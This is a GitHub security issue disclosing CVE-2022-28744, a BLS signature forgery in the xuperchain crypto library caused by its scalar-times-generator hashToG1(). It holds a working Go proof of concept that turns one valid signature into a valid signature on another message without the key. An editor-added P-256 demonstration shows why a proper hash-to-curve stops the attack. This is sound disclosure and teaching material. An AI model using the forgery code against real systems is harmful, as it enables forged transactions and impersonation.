
Security issue #29

Open
k3mmio opened this issue Mar 9, 2022 · 1 comment
Comments


k3mmio commented Mar 9, 2022

We would like to report a vulnerability in the crypto library.
Since there is no security policy mentioned for the repository, can you please forward any contact that we can use to disclose the vulnerability?
Not sure if the disclosure should be done straight in a public issue.


k3mmio commented Apr 25, 2022

Bug Description:
It is possible to forge a BLS signature.

Details:
The bug is in the hash-to-curve function hashToG1() (https://github.com/xuperchain/crypto/blob/master/core/bls_sign/signature.go#L135).
Since the point on the curve is created by scalar multiplication of the hash h of message m with the G1 generator:
S = (sk * h) x G1
an attacker can forge a signature S' for m':
S' = (sk * h') x G1 = (h'/h) x S
where h'/h is computed with the modular inverse mod |G1|.

Proof of Concept:

package main

import (
	"encoding/json"
	"log"
	"math/big"

	bls12_381_ecc "github.com/consensys/gnark-crypto/ecc/bls12-381"
	"github.com/xuperchain/crypto/client/service/xchain"
	"github.com/xuperchain/crypto/core/common"
	"github.com/xuperchain/crypto/core/hash"
)

// forgeSignature turns a valid signature S on msg1 into a signature on msg2
// by multiplying S with h(msg2) * h(msg1)^-1 mod |G1|. This works because
// hashToG1() computes H(m) = h(m) x G1, so S = (sk * h(msg1)) x G1.
func forgeSignature(msg1 []byte, msg2 []byte, sigPointG1 *bls12_381_ecc.G1Affine) *bls12_381_ecc.G1Affine {
	k := hash.HashUsingSha256(msg1)
	intK := new(big.Int).SetBytes(k)

	// |G1| = 52435875175126190479447740508185965837690552500527637822603658699938581184513
	m := new(big.Int)
	m.SetString("52435875175126190479447740508185965837690552500527637822603658699938581184513", 10)

	// h(msg1)^-1 mod |G1|
	inverse := new(big.Int).ModInverse(intK, m)

	k2 := hash.HashUsingSha256(msg2)
	intK2 := new(big.Int).SetBytes(k2)

	// forged scalar = h(msg2) * h(msg1)^-1 mod |G1|
	forged := new(big.Int).Mul(intK2, inverse)
	forged = new(big.Int).Mod(forged, m)

	return new(bls12_381_ecc.G1Affine).ScalarMultiplication(sigPointG1, forged)
}

func main() {
	xcc := new(xchain.XchainCryptoClient)

	msg := []byte("Welcome to the world of super chain using NIST.")
	msg2 := []byte("Nobody expects the Spanish inquisition!")

	privateKeyBLS, publicKeyBLS, err := xcc.GenerateBlsKeyPair()
	if err != nil {
		log.Printf("GenerateBlsKeyPair failed and err is: %v", err)
		return
	}

	// Honest signature on msg.
	blsSig, err := xcc.SignBls(privateKeyBLS, msg)
	log.Printf("BLS signature is %s and err is %v", blsSig, err)

	isSignatureMatch, err := xcc.VerifyBlsSig(publicKeyBLS, blsSig, msg)
	log.Printf("Verifying & Unmarshalling BLS signature, isSignatureMatch is %v and err is %v", isSignatureMatch, err)

	// Recover the G1 point S from the JSON-encoded signature.
	signature := new(common.BlsSignature)
	if err := json.Unmarshal(blsSig, signature); err != nil {
		log.Printf("json.Unmarshal failed and err is: %v", err)
		return
	}

	sigPointG1 := new(bls12_381_ecc.G1Affine)
	if _, err := sigPointG1.Unmarshal(signature.S); err != nil {
		log.Printf("G1Affine.Unmarshal failed and err is: %v", err)
		return
	}

	// Derive a signature on msg2 without the private key.
	sigPoint2G1 := forgeSignature(msg, msg2, sigPointG1)

	blsSigForged := &common.BlsSignature{
		S: sigPoint2G1.Marshal(),
	}

	sigContentForged, _ := json.Marshal(blsSigForged)
	log.Printf("%s", sigContentForged)

	// Verification of the forged signature against msg2 succeeds.
	isSignatureMatch, err = xcc.VerifyBlsSig(publicKeyBLS, sigContentForged, msg2)
	log.Printf("Verifying & Unmarshalling BLS signature, isSignatureMatch is %v and err is %v", isSignatureMatch, err)
}

Run:

go run test.go

The reserved number for this bug is CVE-2022-28744
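The following example is added by the editor and is not code from the reporter or from the xuperchain project. It isolates the algebraic reason the report's forgery works and what a fix changes: when H(m) = h(m) x G, a signature sk x H(m) is linear in the publicly computable scalar h(m), so any signature can be rescaled into a signature on any other message; when H(m) is a curve point whose discrete logarithm is unknown (a real hash-to-curve, e.g. RFC 9380), the same rescaling produces a point that fails verification. Assumptions: the Go standard library has no pairing-friendly curve, so P-256 (prime order, cofactor 1) stands in for BLS12-381 G1, and the verifier is modelled by an oracle that holds sk and checks S == sk x H(m), which is exactly the relation the pairing check e(S, G2) == e(H(m), pk) establishes. The secret key and the try-and-increment hash-to-curve are constructed for the demo; all function names are the editor's.

```go
package main

import (
	"crypto/elliptic"
	"crypto/sha256"
	"encoding/binary"
	"fmt"
	"math/big"
)

// Point is an affine point on P-256. P-256 has cofactor 1, so every point on
// the curve lies in the prime-order group and no subgroup check is needed.
type Point struct{ X, Y *big.Int }

var curve = elliptic.P256()

// scalarBytes reduces k mod the group order N and encodes it as 32 big-endian bytes.
func scalarBytes(k *big.Int) []byte {
	return new(big.Int).Mod(k, curve.Params().N).FillBytes(make([]byte, 32))
}

// mul returns k*P.
func mul(p Point, k *big.Int) Point {
	x, y := curve.ScalarMult(p.X, p.Y, scalarBytes(k))
	return Point{x, y}
}

func equal(a, b Point) bool { return a.X.Cmp(b.X) == 0 && a.Y.Cmp(b.Y) == 0 }

// hashToScalar is the message hash h(m) = SHA-256(m) mod N used by the weak scheme.
func hashToScalar(msg []byte) *big.Int {
	d := sha256.Sum256(msg)
	return new(big.Int).Mod(new(big.Int).SetBytes(d[:]), curve.Params().N)
}

// weakHashToGroup mirrors the reported hashToG1(): H(m) = h(m)*G.
// Its discrete logarithm with respect to G is h(m), which anyone can compute.
func weakHashToGroup(msg []byte) Point {
	x, y := curve.ScalarBaseMult(scalarBytes(hashToScalar(msg)))
	return Point{x, y}
}

// strongHashToGroup hashes directly to an x-coordinate (try-and-increment with a
// domain separation tag), so log_G H(m) is unknown to everyone, signer included.
// This toy variant is constructed for the demo; a deployment would use a
// standardized hash-to-curve (RFC 9380), but the algebraic property is the same.
func strongHashToGroup(msg []byte) Point {
	params := curve.Params()
	three := big.NewInt(3)
	for ctr := uint32(0); ; ctr++ {
		var suffix [4]byte
		binary.BigEndian.PutUint32(suffix[:], ctr)
		in := append([]byte("toy-hash-to-curve-v1:"), msg...)
		d := sha256.Sum256(append(in, suffix[:]...))
		x := new(big.Int).Mod(new(big.Int).SetBytes(d[:]), params.P)
		// P-256 equation: y^2 = x^3 - 3x + b (mod p)
		rhs := new(big.Int).Exp(x, three, params.P)
		rhs.Sub(rhs, new(big.Int).Mul(x, three))
		rhs.Add(rhs, params.B)
		rhs.Mod(rhs, params.P)
		if y := new(big.Int).ModSqrt(rhs, params.P); y != nil && curve.IsOnCurve(x, y) {
			return Point{x, y}
		}
	}
}

// sign computes S = sk*H(m) for the chosen hash-to-group function.
func sign(sk *big.Int, msg []byte, h2g func([]byte) Point) Point {
	return mul(h2g(msg), sk)
}

// verify models the pairing check e(S, G2) == e(H(m), pk) with an oracle that
// holds sk: both accept exactly when S == sk*H(m). (P-256 has no pairing.)
func verify(sk *big.Int, msg []byte, sig Point, h2g func([]byte) Point) bool {
	return equal(sig, mul(h2g(msg), sk))
}

// forge is the rescaling from the report: S' = (h(m2) * h(m1)^-1 mod N) * S.
func forge(msg1, msg2 []byte, sig Point) Point {
	n := curve.Params().N
	inv := new(big.Int).ModInverse(hashToScalar(msg1), n)
	return mul(sig, new(big.Int).Mod(new(big.Int).Mul(hashToScalar(msg2), inv), n))
}

// ForgeryVerifies signs a message with a constructed demo key, rescales the
// signature onto a second message and reports whether the verifier accepts it.
func ForgeryVerifies(h2g func([]byte) Point) bool {
	sk := hashToScalar([]byte("constructed demo secret key, not a real key")) // constructed
	msg1 := []byte("Welcome to the world of super chain using NIST.")
	msg2 := []byte("Nobody expects the Spanish inquisition!")
	sig := sign(sk, msg1, h2g)
	if !verify(sk, msg1, sig, h2g) {
		panic("honest signature must verify")
	}
	return verify(sk, msg2, forge(msg1, msg2, sig), h2g)
}

func main() {
	fmt.Println("forgery accepted with H(m) = h(m)*G:       ", ForgeryVerifies(weakHashToGroup))
	fmt.Println("forgery accepted with proper hash-to-curve:", ForgeryVerifies(strongHashToGroup))
}
```

With the weak map the rescaled point is bit-for-bit the honest signature on msg2, so no verifier can distinguish it; with the proper map it matches only if H(m2) happens to equal (h(m2)/h(m1)) x H(m1), which for independent hash outputs has probability about 1/N. The defensive takeaway for reviewers of BLS code is that the check "does the signature verify" is not enough: the hash-to-curve step must not leak the discrete logarithm of H(m), which a scalar-times-generator construction always does.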
